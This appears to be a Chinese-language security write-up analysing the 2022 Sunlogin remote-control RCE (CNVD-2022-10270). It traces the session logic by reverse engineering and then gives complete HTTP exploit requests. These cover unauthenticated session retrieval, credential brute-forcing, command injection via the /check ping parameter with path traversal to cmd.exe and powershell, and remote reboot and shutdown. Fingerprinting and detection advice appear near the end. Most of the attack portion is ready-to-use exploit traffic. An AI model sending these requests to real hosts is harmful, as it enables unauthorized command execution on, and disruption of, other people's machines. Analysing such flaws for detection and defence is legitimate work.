0x00 相关报道
0x01 程序详情
测试程序版本为11.0.0.33162
,官网目前只开放12.5版本,但是可以遍历下载ID进行下载
向日葵为C++编写,使用UPX3.X加壳故此分析前需要进行脱壳处理(github上有UPX项目,可以直接脱)
此外向日葵在启动的时候会随机启动一个4W+高位端口并记录在日志中,具体在sub_140E0AAE8
可看到
0x02 根据日志找session
社会孙在视频中有一段疑似session的字符串
根据这段疑似session
的关键字在向日葵一次正常远程的日志中找到了关键字CID
随后载入IDA,对CID关键字进行搜索
找到3个函数存在CID关键字字符串
sub_140E20938
、sub_140E1C954
、sub_140E1A1F4
往上跟发现分别对应接口
/cgi-bin/rpc
和/cgi-bin/login.cgi
其中在函数sub_140E1C954
对应接口功能/cgi-bin/rpc
中,传入如下参数即可在未授权的情况下获取到有效session
POST /cgi-bin/rpc HTTP/1.1 Host: 10.100.100.5:49670 Proxy-Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: SLRC/11.0.0.33162 (Windows,x64)Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 62
action=verify-haras
|
在知道被控端的验证码和识别码的情况下传入如下参数可获取到session
在知道主机的帐密的情况下通过/cgi-bin/login.cgi
接口传入如下参数可获取到session并返回设备的公网、内网地址等信息,该接口同时可用作暴力破解
POST /cgi-bin/login.cgi HTTP/1.1 Host: 10.100.100.5:49670 Proxy-Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 52
act=login&username=admin&password=admin&hostname=a
|
0x03 RCE-trick
assist参数拼接导致
我这边没有成功,有思路的师傅可以交流下
POST /assist HTTP/1.1 Host: 10.100.100.5:49496 Proxy-Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Cookie: CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3 connection: close Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 110
fastcode=888888+||+"aaa"+%26%26+||+c:\windows\system32\cmd.exe+/c+whoami+>+C:\\Users\\__SUNLOGIN_USER__\\1.txt
|
0x04 RCE1
ping命令拼接导致
GET /check?cmd=ping%20127.0.0.1%20|%20cmd%20/c%20echo%20whoami%00 HTTP/1.1 Host: 10.100.100.5:49496 Proxy-Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Cookie: CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3 connection: close Accept-Language: zh-CN,zh;q=0.9
|
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+net+user HTTP/1.1 Host: 10.100.100.5:49496 Proxy-Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Cookie: CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3 connection: close Accept-Language: zh-CN,zh;q=0.9
|
GET /check?cmd=ping../../../SysWOW64/cmd.exe+/c+net+user HTTP/1.1 Host: 10.100.100.5:49496 Proxy-Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Cookie: CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3 connection: close Accept-Language: zh-CN,zh;q=0.9
|
0x05 远程重启
GET /control.cgi?__mode=control&act=reboot HTTP/1.1 Host: 10.100.100.5:49934 Proxy-Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Cookie: CID=lzKrTiUH5Z7GagluSTocMmHBAF9Pxz75 Accept-Language: zh-CN,zh;q=0.9
|
0x06 远程关机
GET /control.cgi?__mode=control&act=shutdown HTTP/1.1 Host: 10.100.100.5:49934 Proxy-Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Cookie: CID=lzKrTiUH5Z7GagluSTocMmHBAF9Pxz75 Accept-Language: zh-CN,zh;q=0.9
|
0x07指纹信息
低版本向日葵特征 body="Verification failure" && body="false" && header="Cache-Control: no-cache" && header="Content-Length: 46" && header="Content-Type: application/json"
0x08检测手段
主机层
主机层可通过检测向日葵连接日志中是否存在ping
、../
等关键字进行检查是否被入侵
帐号暴力破解可通过检查事件查看器中的类似日志进行排查
网络层
- 检查高位端口流量中是否存在向日葵指纹特征
- 检查流量中是否存在类似
ping../
、nslookup../
关键字
后记
向日葵还有很多接口有兴趣的师傅可以继续跟进看看,我先卸载了。。
login express_login cgi-bin/login.cgi log cgi-bin/rpc transfer cloudconfig getfastcode assist projection getaddress sunlogin-tools control desktop.list check micro-live/enable screenshots httpfile
|
Timeline
- 2022-2-14 监测到国内安全团队发布向日葵远程命令执行演示视频
- 2022-2-15 CNVD发布漏洞通告(CNVD-2022-10270)
- 2022-2-16 国内安全公司发布检测POC
- 2022-2-16 分析报告发布